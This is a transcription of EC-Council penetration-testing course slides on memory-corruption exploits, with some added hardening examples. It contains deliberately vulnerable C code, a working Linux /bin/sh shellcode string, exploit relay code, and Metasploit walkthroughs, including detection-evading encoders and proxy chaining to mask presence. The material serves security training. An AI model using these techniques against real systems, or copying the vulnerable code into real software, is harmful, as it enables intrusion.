ecsav4 module 10 advanced exploits and tools_norestriction


Page 1: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Advanced Penetration Testing and Security Analysis

Module 10: Advanced Exploits and Tools

Copyright © 2004 EC-Council. All rights reserved worldwide. All Rights Reserved. Reproduction is Strictly Prohibited.

Page 2: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Module Objective

This module will familiarize you with:

• Common Vulnerabilities Revisited
• Anatomy of an Exploit: A Typical Overflow
• Tools of the Trade:
  • GDB
  • Metasploit
  • Canvas
  • CORE Impact

Page 3: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Common Vulnerabilities

1. Buffer overflows
2. Heap overflows
3. Format string flaws

Page 4: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Buffer Overflows Revisited

Ralph Echemendia

Page 5: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Smashing the Stack for Fun and Profit

Example code:

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[256];

        if (argc < 2)
            return 1;
        /* No bounds check: an argument longer than 255 bytes overflows buffer */
        strcpy(buffer, argv[1]);
        printf("Buffer::%s\n", buffer);
        return 0;
    }

Page 6: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Smashing the Stack for Fun and Profit (cont'd)

Since there is no bounds checking, anything larger than the buffer runs off into uncontrolled memory space. This gives us the potential to overwrite the saved EIP (return address), hijacking the execution flow of the program.

With control of EIP, we can write our own RET address in, and force the program to execute code of our devising under its security context.

For example, code might spawn a remote netcat shell with the privileges of the user context exploited. If this context is Root or Administrator, the system is completely compromised.
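As an added example (not from the slides): the slide's strcpy() call beside a bounded copy that refuses input which would not fit, plus a helper that reports how many bytes an unchecked copy would spill past the buffer. The 256-byte size mirrors the slide's program; the function names and the rest of the code are this example's own.

```c
/* Added example, not from the EC-Council slides: the strcpy() pattern from
 * the slide beside a bounded copy that refuses oversized input. Names are
 * this example's own. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* same size as the slide's buffer */

/* The slide's pattern: no bounds check, so anything longer than
 * BUF_SIZE - 1 bytes runs past `buffer` into the saved frame pointer and
 * saved return address above it on the stack. Shown for contrast only. */
void copy_unchecked(char *buffer, const char *input)
{
    strcpy(buffer, input);
}

/* How many bytes an unchecked copy of `input` (including its NUL) would
 * write past the end of a buffer of `buffer_size` bytes; 0 means it fits. */
size_t overflow_bytes(size_t buffer_size, const char *input)
{
    size_t needed = strlen(input) + 1;
    return needed > buffer_size ? needed - buffer_size : 0;
}

/* Hardened version: look for the terminator only inside the first
 * buffer_size bytes of input; if it is not there the input cannot fit and
 * the copy is refused rather than truncated or overflowed. */
bool copy_checked(char *buffer, size_t buffer_size, const char *input)
{
    const char *nul = memchr(input, '\0', buffer_size);
    if (nul == NULL) {
        return false;                         /* would overflow: refuse */
    }
    memcpy(buffer, input, (size_t)(nul - input) + 1);   /* copies the NUL too */
    return true;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (!copy_checked(buffer, sizeof buffer, argv[1])) {
        fprintf(stderr, "rejected: %zu byte(s) would spill past the buffer\n",
                overflow_bytes(sizeof buffer, argv[1]));
        return 1;
    }
    printf("Buffer::%s\n", buffer);
    return 0;
}
```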

Page 7: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Smashing the Stack for Fun and Profit (cont'd)

Segmentation fault:

• A segmentation fault occurs when a program attempts to do things with memory that it isn't supposed to.

• For example, attempting to write to a read-only address, or following a return address that leads to an odd location.

• Segfaults are often signs of a potentially exploitable condition.

• If dumping large amounts of data into program Foo causes it to segfault, there is a good chance that there is an exploitable bug that could lead to execution control.

Page 8: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Smashing the Heap for Fun and Profit (cont'd)

Heap overflows:

• It is very important that the pointer come after the buffer being overflowed, since the heap grows upward.

• Fill in the buffer. Overwrite the pointer, and point it to the address of our own code.

• Note that the heap must be executable in order for our code to execute.

• Other arcane tricks are possible using function binding in C++ or tricks with the DLMALLOC library.

Page 9: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Smashing the Heap for Fun and Profit (cont'd)

Stack versus heap:

• The stack is used for initialization of temporary values: variables, arrays, etc.

• The heap, however, is used to store things that are expected to persist throughout the execution cycle of the program.

• Heap overflows are usually more difficult to exploit than traditional stack-based buffer overflows. You need a statically defined buffer and a pointer:

    static char buf[BUFSIZE];
    static char *ptr_to_something;

Page 10: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Format Strings for Chaos and Mayhem

Format string vulnerabilities:

Did you really mean to type printf(buffer)? Or did you mean printf("%s", buffer)? In the first example, the buffer is evaluated as a format string, and any formatting instructions will be parsed.

If buffer is made up of user input, things can get interesting.

Use formatting tokens (%s, %x) to start exploring the stack space, returning memory addresses.

With some cleverness you can map out memory space nicely: return addresses, shellcode, etc.

Page 11: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Format Strings for Chaos and Mayhem (cont'd)

Code example: user input used as a format string to print the buffer.

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    static char find_me[] = "..Buffer was lost in memory\n";

    int main(void)
    {
        char buf[512];
        char tmp[512];
        ssize_t n;

        while (1) {
            memset(buf, '\0', 512);
            /* read one byte less than the buffer so it stays NUL-terminated */
            n = read(0, buf, sizeof(buf) - 1);
            if (n <= 0)
                break;
            /* user input is the format string: %s, %x and %n get interpreted */
            sprintf(tmp, buf);
            printf("%s", tmp);
        }
        return 0;
    }

Page 12: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Format Strings for Chaos and Mayhem (cont'd)

Format string vulnerabilities:

• How do you get the buffer to be displayed? Simple. Just use the four-byte address of the buffer as an argument to %s. For example, printf "\x41\x41\x41\x41%s\n" piped to your program.

• You can use this to dump arbitrary memory locations. No more hunting for RET addresses. You can inspect memory and find it.

Page 13: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Format Strings for Chaos and Mayhem (cont'd)

Format strings: writing into memory:

%n is a very useful little formatting token. It takes an int * as an argument, and writes the number of bytes already written to that location.

By carefully controlling the number of bytes written, and breaking the writes up into small operations, you can construct a memory address to be written to an arbitrary location using %n.
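As an added example (not from the slides), covering both the sprintf(tmp, buf) program above and the %s/%n discussion: the fixed-format, bounded replacement that keeps user input out of the format argument, plus an audit helper that counts the conversions an unchecked call would have interpreted and flags %n, the directive that writes to memory. The function names are this example's own.

```c
/* Added example, not from the EC-Council slides: the fix for the slide's
 * sprintf(tmp, buf) pattern, plus an audit helper that reports what an
 * unchecked format string would have done. Names are this example's own. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Walk a string as printf would: count conversion directives and report
 * whether any of them is %n, the one directive that writes to memory.
 * "%%" is a literal percent sign and is not counted. */
size_t scan_format(const char *s, bool *has_n)
{
    size_t count = 0;
    *has_n = false;
    for (const char *p = s; *p; ) {
        if (*p != '%') { p++; continue; }
        if (p[1] == '%') { p += 2; continue; }          /* literal '%' */
        count++;
        p++;                                             /* skip '%' */
        /* flags, width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p)) p++;
        if (*p == 'n') *has_n = true;
        if (*p) p++;                                     /* conversion letter */
    }
    return count;
}

/* Hardened replacement for sprintf(tmp, buf): the user text is data, the
 * format is a constant, and the copy is bounded. Returns false when the
 * input would not fit (snprintf truncates instead of overflowing). */
bool copy_user_text(char *dst, size_t dstsz, const char *src)
{
    int n = snprintf(dst, dstsz, "%s", src);
    return n >= 0 && (size_t)n < dstsz;
}

int main(void)
{
    char buf[512], tmp[512];
    bool has_n;

    /* Same read loop as the slide, but the buffer never reaches a format argument. */
    while (fgets(buf, sizeof buf, stdin)) {
        size_t directives = scan_format(buf, &has_n);
        if (directives) {
            fprintf(stderr, "[audit] input carries %zu conversion(s)%s; an unchecked "
                    "sprintf(tmp, buf) would have interpreted them\n",
                    directives, has_n ? ", including %n" : "");
        }
        if (!copy_user_text(tmp, sizeof tmp, buf)) {
            fputs("[audit] input too long, dropped\n", stderr);
            continue;
        }
        printf("%s", tmp);    /* any tokens in tmp are printed literally */
    }
    return 0;
}
```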

Page 14: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

The Anatomy of an Exploit

• Vulnerable code
• Shellcode
• Delivery code
• Tools of the Trade: Debuggers

Page 15: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Vulnerable Code

Some more vulnerable code:

    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[500];

        /* unbounded copy: an argument longer than 499 bytes overflows buffer */
        if (argc >= 2)
            strcpy(buffer, argv[1]);
        return 0;
    }

A basic program that creates a 500-byte buffer, and puts the first command line argument into it.

Page 16: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Shellcode

We have 500 bytes to play with.

Since we have to fill up the buffer anyway, why not fill it with our malicious code?

Shellcode is the code to be loaded into memory for execution (the malicious code mentioned above). It is in the format of raw 'opcodes', which are executed directly by the CPU.

Shellcode is often architecture and OS dependent. Code written for Linux on SPARC won't work on an x86 Linux system. Likewise, code for Windows is different from code for Linux.

Page 17: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Shellcode Examples

    char shellcode[] =
        "\x31\xc0"              // xorl %eax,%eax
        "\x50"                  // pushl %eax
        "\x68\x6e\x2f\x73\x68"  // pushl $0x68732f6e
        "\x68\x2f\x2f\x62\x69"  // pushl $0x69622f2f
        "\x89\xe3"              // movl %esp,%ebx
        "\x99"                  // cltd
        "\x52"                  // pushl %edx
        "\x53"                  // pushl %ebx
        "\x89\xe1"              // movl %esp,%ecx
        "\xb0\x0b"              // movb $0xb,%al
        "\xcd\x80";             // int $0x80

Root shell spawned with execve() call for Linux

Page 18: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Shellcode (cont’d)

Null Operations (NOPs)

NOPs are any exploit writer's friend. All they do is tell the CPU to wait for a bit, then go on to the next instruction.

How do you tell where your shellcode is in memory? Often you can't find the exact start of the code.

Instead, you can pad your code with NOPs. With our 500-byte buffer we have quite a lot of space for, say, 50 bytes of shellcode to live.

Since it is difficult to tell where exactly the code starts, stick in 450 bytes of null operations before the shellcode.

Redirect the execution flow to point somewhere towards where you think the beginning of the buffer is.

The CPU will hit the NOPs, and 'slide' through them until it hits the shellcode payload, thus giving rise to the term 'NOP Slide'.

Page 19: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Delivery Code

The delivery code is designed to deliver the shellcode to the target machine:

• Any network communication code necessary, such as generating an HTTP request, or filling in a login field.

• Handles loading the code into memory, and filling up the vulnerable buffers.

• Error handling. User friendliness. The 'glue' that holds the 'sploit' together.

Page 20: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Delivery Code: Example

Delivery script snippet, setting up the connection for an RPC overflow (the relay loop that shuttles bytes between the local terminal and the socket):

    /* fd_set fdreadme; int sockfd, i; char rb[1024]; assumed declared above */
    while (1) {
        /* select() modifies the set, so rebuild it on every iteration */
        FD_ZERO(&fdreadme);
        FD_SET(sockfd, &fdreadme);
        FD_SET(0, &fdreadme);
        if (select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0)
            break;
        if (FD_ISSET(sockfd, &fdreadme)) {
            if ((i = recv(sockfd, rb, sizeof(rb), 0)) < 0) {
                printf("[-] Connection lost..\n");
                exit(1);
            }
            if (write(1, rb, i) < 0)
                break;
        }
        if (FD_ISSET(0, &fdreadme)) {
            if ((i = read(0, rb, sizeof(rb))) < 0) {
                printf("[-] Connection lost..\n");
                exit(1);
            }
            if (send(sockfd, rb, i, 0) < 0)
                break;
        }
        usleep(10000);
    }
    printf("[-] Connection closed by foreign host..\n");
    exit(0);
    }

Page 21: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Linux Exploits versus Windows

Shellcode is simpler and smaller than in Windows. Examples run as small as 24 bytes. Syscalls make life much easier.

Syscalls are predefined standard functions that the kernel will perform for you.

To use a syscall, you fill a few registers with data, then fill another register with the number of the syscall you want to use, and execute an interrupt.

Using execve(), you can fork the current process and execute a file. For example, fork the current process and execute /bin/sh.

Page 22: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Linux Exploits versus Windows (cont'd)

Smaller shellcode size means easier exploitation:

• Windows requires larger shellcode. This places a lower limit on the size of buffers that can be exploited.

• With shellcode of 24 bytes, many more possibilities are opened.

With Linux exploitation becoming easier, more people with less skill are getting into it:

• The old adage about 'Linux users being more security minded' is no longer very true.

• Linux machines make juicy targets.

Page 23: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Windows versus Linux

Windows has a much more complex, monolithic codebase than most Linux systems.

Linux is a kernel. Windows is an entire integrated OS. This presents a larger attack surface.

Windows is the most widely used operating system in the world. This means more eyes are looking and therefore it is a higher profile target.

Writing exploits for Windows, however, is somewhat more difficult than Linux.

Page 24: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Windows versus Linux (cont'd)

Writing shellcode is more complex.

Windows shellcode doesn't seem to get much smaller than about 800 bytes. This places a lower limit on the size of buffer that can be exploited.

Denial-of-Service attacks are still possible with smaller buffers, however.

Windows doesn't use syscalls. You have to directly manipulate the Windows API.

There aren't any clean methods for spawning a shell. All of this combines to greatly increase the size of shellcode necessary for a successful 'sploit.

Offsets and RET addresses can change from Service Pack to Service Pack as well, further complicating issues.

Page 25: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: Debuggers

Offsets? Return addresses? EAX? EIP?

• Where is your bad buffer located? Where did your shellcode go? Where do you return to, now that you have control of the execution flow?

• A debugging tool is essential to discovering these things and discovering exactly what is happening in memory.

• OllyDBG and GDB are some of the more commonly used debuggers for the nefarious purposes of exploitation.

• Standard practice is to set up a machine as close to the target as possible. Run the vulnerable application through a debugger.

• Watch what happens, where ideally you will at least get close to the target.

Page 26: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: GDB

GDB has ports to every major operating system and is one of the more widely used debuggers.

It is extremely powerful and flexible, and free as well.

You can launch GDB in a variety of ways:

To launch GDB with an executable:

• Type gdb <binary>

To load a core file:

• Type gdb <core-file>

To attach to a running process, first launch GDB, and then:

• Type attach <pid>

Page 27: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: GDB (cont'd)

Searching through memory:

• show decimal: (gdb) x/d 'address' or (gdb) x 'address'
• show next 100 decimals: (gdb) x/100d 'address'
• show decimal at 0x0804846c: (gdb) x 0x0804846c
• show strings at address: (gdb) x/s 'address'
• show 105 strings at 0x0804846c: (gdb) x/105s 0x0804846c
• show hexadecimal at address: (gdb) x/x 'address'
• show 10 hex words at 0x0804846c: (gdb) x/10x 0x0804846c
• show byte at 0x0804846c: (gdb) x/b 0x0804846c
• show 10 bytes at 0x0804846c-10: (gdb) x/10b 0x0804846c-10
• show 10 bytes at 0x0804846c+20: (gdb) x/10b 0x0804846c+20
• show 20 assembler instructions at address: (gdb) x/20i 0x0804846c

Page 28: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: GDB (cont'd)

Breakpoints:

• To set a breakpoint, type break <name of function or memory address>

• Then type run to run the loaded executable.

• Execution will continue until the breakpoint reaches the matched function.

Breakpoints are useful to freeze the execution flow of a binary, and analyze the memory state:

• For example, if you knew there was a vulnerability in function foo, then you could set a breakpoint on the execution of foo.

• The debugger would freeze the program, and allow you to dissect and analyze foo and determine the precise addresses necessary for the 'sploit.

Page 29: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: GDB (cont'd)

Additional commands:

• To show the value of a register, type print $<register>

• To show all registers at a given point, type info registers

• To list the sections of an executable, type maintenance info sections

• To disassemble a function, type disassemble <function>

Page 30: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: Metasploit

Why do it all yourself? Repeatability is your friend:

• The Metasploit framework is an open source platform for vulnerability research and development, and penetration testing.

• Metasploit handles building shellcode and delivery code for you. You select the payload you want, then select the exploit to use. Push a button, and it fires, attempting to exploit the remote service.

http://www.metasploit.com/

Page 31: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: Metasploit (cont'd)

Metasploit includes exploits such as the following:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

AppleFileServer LoginExt PathName Buffer Overflow
Apache Win32 Chunked Encoding
ISS PAM.dll ICQ Parser Buffer Overflow
DistCC Daemon Command Execution
Exchange 2000 MS03-46 Heap Overflow
Frontpage fp30reg.dll Chunked Encoding
IA WebMail 3.x Buffer Overflow
IIS 5.0 nsiislog.dll POST Overflow
IIS 5.0 Printer Buffer Overflow
IIS 5.0 WebDAV ntdll.dll Overflow
IMail LDAP Service Buffer Overflow
Microsoft LSASS MSO4-011 Overflow

Page 32: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit Framework (screenshot)

Page 33: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: Metasploit (cont'd)

Metasploit includes exploits such as the following:

• Mercantec SoftCart CGI Overflow
• Microsoft RPC DCOM MSO3-026
• MSSQL 2000 Resolution Overflow
• Poptop Negative Read Overflow
• RealServer Describe Buffer Overflow
• Samba Fragment Reassembly Overflow
• Samba trans2open Overflow
• Sambar 6 Search Results Buffer Overflow
• Serv-U FTPD MDTM Overflow
• SMB Password Capture Service
• Solaris sadmind Command Execution
• Squid NTLM Authenticate Overflow
• Subversion Date Svnserve
• Unreal Tournament 2004 "secure" Overflow (Linux)
• Unreal Tournament 2004 "secure" Overflow (Win32)
• War-FTPD 1.65 PASS Overflow
• Windows SSL PCT Overflow

Page 34: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Tools of the Trade: Metasploit (cont'd)

Metasploit has several payloads that can be automatically combined with the listed exploits.

• Shellcode payloads exist for Windows, BSDI, Solaris, Linux, Mac OS X, and FreeBSD.

• The payloads can execute arbitrary commands, spawn shells, reverse-connect shells, load VNC, connect back with VNC, inject DLLs, and more.

• Encoding engines also exist for the major platforms. The encoding engines encrypt and change your shellcode to bypass signature-based detection.

Page 35: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit

1. Starting and running Metasploit
2. The environment
3. Common commands
4. Setting up an exploit
5. Launching the exploit
6. Advanced features

Page 36: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

User-Interface Modes

Msfconsole:

• It is the Metasploit interactive shell user interface.
• It's the most useful for learning the program and for playing with the system.

Msfcli:

• It is the command-line interface.
• It isn't as user-friendly, but provides for easy scripting and is good for batch jobs.

Msfweb:

• It is the web interface.
• The interface is still a bit rough, but is useful for team environments.
• Exploited machine connections are proxied to a random port on the web server.
• The user is then given a telnet link to the listener.

*Note that the web interface currently has very little security, and only listens on localhost by default*

Page 37: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Console Screenshot


Page 38: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Msfweb Console: Screenshot


Page 39: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit: Environment

The Metasploit environment system is logically divided into two components, the temporary environment and the global environment.

Global:

• The Global Environment is just that, global.
• Variables set here apply to everything.

Temporary:

• The Temporary Environment overrides the Global Environment.
• Each exploit has its own Temporary Environment, which is loaded and unloaded with the exploit.

Page 40: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit: Environment (cont'd)

Global environment variables allow you to set options that are the same across multiple exploits to save time:

• For example, if you are using only a certain payload, you can specify the PAYLOAD variable in the Global Environment to set it across all machines.

Using the Environment effectively is key to making Metasploit fast and effective for you.

The Framework can be controlled in a very fine-grained manner via the various variable options available.

Page 41: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Environment: Global Environment

To interact with the global environment, use the commands 'setg' and 'unsetg':

• setg, by itself, displays the current Global Environment. To set a variable, use setg foo bar where foo is the variable and bar is its value.

• unsetg will clear the entire Global Environment.

The global environment is loaded from defaults on startup. You can save new Global and Temporary Environments with the 'save' command.

Page 42: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Environment: Temporary Environment

The Temporary Environment is accessed through the set and unset commands.

Variables that are set are specific to the exploit that is loaded.

Inactive environments are simply stored in memory until the exploit they are associated with is loaded.

Page 43: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit: Environment Screenshot

Page 44: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit: Options

Useful environment variables:

• Logging: enables or disables session logging
• LogDir: where the logs will be stored
• Encoder: comma-separated list of preferred encoders
• Nop: same as above, except for the NOP engines
• RandomNops: allows randomized NOP sleds to be used
• Proxies: forces all TCP links to go through specified proxies
• NinjaHost: redirects payload connections to the specified server running the Metasploit SocketNinja tool
• NinjaDontKill: used to exploit multiple systems at once
• EnablePython: required to use the InlineEgg Python payloads

Page 45: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit: Commands

Informational commands:

help: if you ever get lost, just type 'help'.

show:

• show exploits – shows loaded exploits
• show payloads – shows payloads available
• show encoders – shows the available encoding engines
• show nops – shows the available NOP engines
• show options – shows the configurable options for an exploit
• show advanced – shows advanced options for an exploit

info: gives you detailed information on a payload or an exploit.

Page 46: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Nop and Payload Generation Screenshot

Page 47: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit: Commands (cont'd)

Setting up your exploit:

1. Use show exploits to list the loaded exploits.
2. Once you find your poison of choice, load it by typing use <name of exploit>.
3. Configure the exploit.
4. Type show options to see what variables can be set for the option. You'll usually use RHOST and RPORT to specify the target and port number.
5. Some exploits have advanced options.
6. Use show advanced to see them.

Page 48: ECSAv4 Module 10 Advanced Exploits and Tools_NoRestriction

Metasploit: Commands (cont'd)

Once your options are set, test them with the check command:

• The check command verifies all your options, and attempts to verify that the target is actually vulnerable, if possible.

• Not all exploits have check functionality built in. check should never result in harm to the remote machine.

Set your payload:

• Select a payload from the list, and link it to the exploit with the command set payload <name of payload>.

• show options can be used to show any options.

Now select a target:

• If an exploit supports multiple platforms, then you will need to set the target variable.

• Default is bruteforcing the remote system's type, which often isn't desirable.


Metasploit: Launching the Exploit

Launching the exploit:

• Now comes the most complicated part of all. Once you have all of the commands set up, you now have to go through an intricate dance comprised of memorized sequences and good timing. Only the most 1337 of h@x0z will master the final steps… the pathway to pwnage…


Metasploit: Launching the Exploit (cont'd)

Type exploit. Hit enter. Congratulate yourself for being l33t.


http://www.metasploit.com/


Metasploit: Background Exploit Screenshot


Metasploit: Advanced Features

InLineEgg Python payloads:

• InLineEgg is a Python class designed for generating small ASM programs.
• This is commonly used for generating custom payloads.
• Built by Gera from CoreST for their Core Impact tool, but the class was released under an open license.
• The exploit payloads are dynamically generated based off of Python scripts in the payloads/external directory.
• The enablepython environment variable must be set to use this. Setting it to any non-zero value will work.


Advanced Features (cont’d)

Impurity ELF injection:

• Metasploit supports Alexander Cuttergo's method of loading and running an ELF executable in memory.
• This allows for very complex payload code to be written and compiled using standard C.
• All you need is a special wrapper payload.
• The pexec option must be set to the path of the executable.
• The executables must be compiled just right, however.


Advanced Features (cont’d)

Proxy chaining:

• Using the proxy variable, mentioned earlier, you can chain multiple proxies to mask your presence.
• Each server must be in the format type:host:port, where type is either HTTP or SOCKS4.
• The chaining functionality has tested stable with over five hundred proxies configured in a random chain.
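As an added example (written for this page; it is not Metasploit's own code), here is a small Python parser that validates proxy-chain entries in the type:host:port form the slide describes. The slide only fixes the per-entry format and the two types, HTTP and SOCKS4; everything else is this example's assumption: several entries are joined with commas, the type is matched case-insensitively, and a host is an IPv4 literal or a DNS name. IPv6 literals are rejected because their colons cannot be told apart from the field separators. The sample chain is constructed from documentation addresses.

```python
"""Validate a proxy chain given in Metasploit's type:host:port notation.

Added example for this page, not Metasploit's own code.  The deck states
only the per-entry format (type:host:port with type HTTP or SOCKS4).  The
comma separator, case-insensitive type and IPv4-or-DNS host rule below are
this example's own assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List

# The two proxy types the deck lists.
ALLOWED_TYPES = frozenset({"HTTP", "SOCKS4"})

# DNS hostname: dot-separated labels of 1-63 characters, at most 253 total.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9-]{1,63}\.)*[A-Za-z0-9-]{1,63}$"
)

# Constructed sample chain using RFC 5737 / RFC 2606 documentation values.
SAMPLE_CHAIN = "HTTP:proxy-a.example.net:8080,SOCKS4:192.0.2.10:1080"


class ProxySpecError(ValueError):
    """Raised for an entry that does not match type:host:port."""


@dataclass(frozen=True)
class Proxy:
    kind: str   # "HTTP" or "SOCKS4"
    host: str
    port: int


def _valid_host(host: str) -> bool:
    """Accept an IPv4 literal or a DNS hostname.

    IPv6 literals are deliberately rejected: their colons cannot be told
    apart from the field separators of this format (assumption).
    """
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(host))


def parse_proxy(entry: str) -> Proxy:
    """Parse one type:host:port entry, raising ProxySpecError on any defect."""
    parts = entry.strip().split(":")
    if len(parts) != 3:
        raise ProxySpecError(f"expected type:host:port, got {entry!r}")
    kind, host, port_text = parts
    kind = kind.upper()  # case-insensitive type (assumption)
    if kind not in ALLOWED_TYPES:
        raise ProxySpecError(f"unsupported proxy type {kind!r} in {entry!r}")
    if not _valid_host(host):
        raise ProxySpecError(f"invalid host {host!r} in {entry!r}")
    if not port_text.isdigit() or not 1 <= int(port_text) <= 65535:
        raise ProxySpecError(f"invalid port {port_text!r} in {entry!r}")
    return Proxy(kind, host, int(port_text))


def parse_proxy_chain(spec: str) -> List[Proxy]:
    """Parse a comma-separated chain; list order is the hop order."""
    entries = [e for e in spec.split(",") if e.strip()]
    if not entries:
        raise ProxySpecError("empty proxy chain")
    return [parse_proxy(e) for e in entries]


def describe_chain(chain: List[Proxy]) -> str:
    """Render a chain as 'HTTP host:port -> SOCKS4 host:port'."""
    return " -> ".join(f"{p.kind} {p.host}:{p.port}" for p in chain)


if __name__ == "__main__":
    hops = parse_proxy_chain(SAMPLE_CHAIN)
    print(describe_chain(hops))
    for bad in ("FTP:192.0.2.10:21", "HTTP:192.0.2.10", "SOCKS4:192.0.2.10:70000"):
        try:
            parse_proxy(bad)
        except ProxySpecError as exc:
            print("rejected:", exc)
```

Rejecting malformed entries up front matters in practice because a chain of several hundred hops, as the slide describes, is otherwise hard to debug when one entry silently fails to connect.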


Advanced Features (cont’d)

Win32 DLL Injection payloads:

• Metasploit is able to execute staged payloads that can inject custom DLLs into memory, using any win32 exploit.
• The DLLs are not written to disk, and reside only in memory, forked off the owned process.
• Build a standard DLL. Export a function called 'init', and have it take a single argument, an int, which is the socket descriptor of the connection.
• Init is launched in a new thread when the process is exploited.


Advanced Features (cont’d)

VNC DLL injection:

• To demonstrate the capabilities of DLL injection, metasploit ships with the ability to load a VNC server on the target.

• A custom payload was developed using the VNC server created by Matt Miller off of the RealVNC code.

• This payload starts up a VNC server on exploitation. It will first attempt to grab control of the user’s desktop.

• If it fails, then it will fall back to ‘read-only’ mode, where you can view the desktop, but not interact with it.

• If access is gained, then VNC will spawn a command shell, with the privileges of the user the exploited process was running as.


• This is useful when you exploit a service running as Local_system, but grab a desktop from an unprivileged user.


Metasploit VNC Injection


Lab

Metasploit: Take time as defined by your instructor to use this tool to exploit a vulnerable host(s) on YOUR target organization.


Tools of the Trade: Canvas

Canvas is a commercial shellcode and payload generator written in Python by Dave Aitel.

http://www.immunitysec.com/


Tools of the Trade: Canvas (cont'd)

• Take advantage of over 50 exploits, written and tested by Immunity's team.
• Completely open design allows a team to adapt CANVAS to their environment and needs.
• Advanced infrastructure is second to none, and exploits get updated as often as weekly.
• Some exploits in CANVAS are available nowhere else:
  • Microsoft ASN.1 exploit
  • Exploits for Immunity Research vulnerabilities such as:
    • NAI ePolicy Orchestrator
    • Compaq Web Management
    • Computer Associates Unicenter


Tools of the Trade: Canvas (cont'd)

Does not restrict your use of CANVAS to any particular IP range or use

Does not expire when your support period is over

CANVAS works on Windows 2000, XP, and Linux (or any other system that runs Python 2.2 or greater and pyGTK)

Delivery of CANVAS is purely over the Internet

Notifications are sent to your email address, and you can download CANVAS at any time from the Immunity website

Watermarked to the customer: if your copy of CANVAS leaks, you may be refused additional support and updates


Screenshots


Lab

Canvas: Take time as defined by your instructor to use this tool to exploit a vulnerable host(s) on YOUR target organization.


Tools of the Trade: CORE Impact

CORE Impact is a commercial shellcode and payload generator as well.


Tools of the Trade: CORE Impact (cont'd)

CORE Impact is an automated, comprehensive penetration testing product for assessing specific information security threats to an organization.

CORE IMPACT can be run completely autonomously. The steps in this process include:

1 • Information Gathering.
2 • Attack and Penetration.
3 • Local Information Gathering.
4 • Privilege Escalation.
5 • Clean Up.
6 • Report Generation.


Tools of the Trade: CORE Impact (cont'd)

Identify the real risk to your organization with CORE Impact:

• Automates, and reduces the cost of, the critical but previously manual and expensive penetration testing process.
• Allows organizations to safely launch real-world attacks by running exploits against a target network without altering the system.
• Conducts all testing procedures methodically in one visual software package.
• Tests for external and internal vulnerabilities, including those that relate to how network components work together.
• Eliminates false positives, reports precisely where a network could be penetrated and the associated security risks.
• Helps prioritize remediation efforts.


IMPACT Industrializes Penetration Testing

WHAT DOES CORE IMPACT DO?

Mimics attacker behavior ⏐ launches real-world attacks safely and efficiently, demonstrating exactly what an attacker can do.

Industrializes penetration testing ⏐ automates previously manual, expensive process with Core Impact Rapid Penetration Test (RPT).

Provides important features:

